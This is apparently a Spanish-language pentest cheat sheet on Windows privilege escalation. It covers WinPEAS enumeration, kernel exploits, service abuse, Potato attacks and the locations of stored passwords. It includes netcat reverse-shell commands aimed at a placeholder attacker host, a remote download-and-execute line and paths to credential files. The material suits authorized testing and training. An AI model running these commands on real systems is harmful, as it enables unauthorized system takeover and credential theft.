Salta el contingut

Windows Privilege Escalation

[!danger] GOAL: SYSTEM Tienes acceso como usuario raso o servicio de red. Quieres NT AUTHORITY\SYSTEM o Administrator.

1. Automated Enumeration (WinPEAS)

No pierdas tiempo mirando a mano. Ejecuta el script. 

# Desde memoria (si tienes internet/pivoting)
iex(new-object net.webclient).downloadstring('http://<KALI_IP>/winPEASx64.exe')

# Ejecución estándar y guardar output (para buscar keywords luego)
.\winPEASx64.exe > output.txt
Qué buscar en el output (Color Rojo/Negrita): * SUID-like: AlwaysInstallElevated * Services: Permisos de escritura en binarios de servicio. * Creds: Winlogon, Autologon, Credentials Manager.

2. Kernel Exploits (The Old Way)

Si la máquina es vieja (Server 2008/2012) y no está parcheada. 1. Systeminfo: Guarda la salida de systeminfo. 2. Windows-Exploit-Suggester: 

python wes.py systeminfo.txt -i 'systeminfo'
3. Compilar exploit: Busca en Google/Searchsploit (ej: MS16-032).

3. Service Abuse (Common)

A. Unquoted Service Paths

Si un servicio corre desde: C:\Program Files\My Service\service.exe (sin comillas). Windows intentará ejecutar: 1. C:\Program.exe 2. C:\Program Files\My.exe... Attack: Coloca tu reverse shell maliciosa en C:\Program.exe y reinicia el servicio o la máquina.

B. Insecure Service Permissions

Si accesschk o WinPEAS dice que puedes modificar la configuración del servicio (SERVICE_CHANGE_CONFIG o GenericWrite). 

# Cambiar el binpath por nuestra shell
sc.exe config <ServiceName> binPath= "C:\Temp\nc.exe -e cmd.exe <KALI_IP> 443"
sc.exe stop <ServiceName>
sc.exe start <ServiceName>

4. Potato Attacks (SeImpersonate Priv)

[!important] The "Golden" Privilege Ejecuta whoami /priv. Si ves SeImpersonatePrivilege habilitado, YA ERES SYSTEM.

Herramientas (elige según la versión de Windows): * JuicyPotato: Windows Server 2016 y anteriores. * PrintSpoofer: Windows Server 2019 / Windows 10. .\PrintSpoofer.exe -i -c cmd * GodPotato: Versiones más nuevas.

Uso (PrintSpoofer example): 

# -i = interactivo, -c = comando
.\PrintSpoofer.exe -i -c "nc.exe <KALI> 443 -e cmd"

5. Passwords in Files

Windows es un desastre guardando credenciales. * Unattend.xml: C:\Windows\Panther\Unattend.xml (busca <Password>). * Powershell History: C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt * Registry (AutoLogon): reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"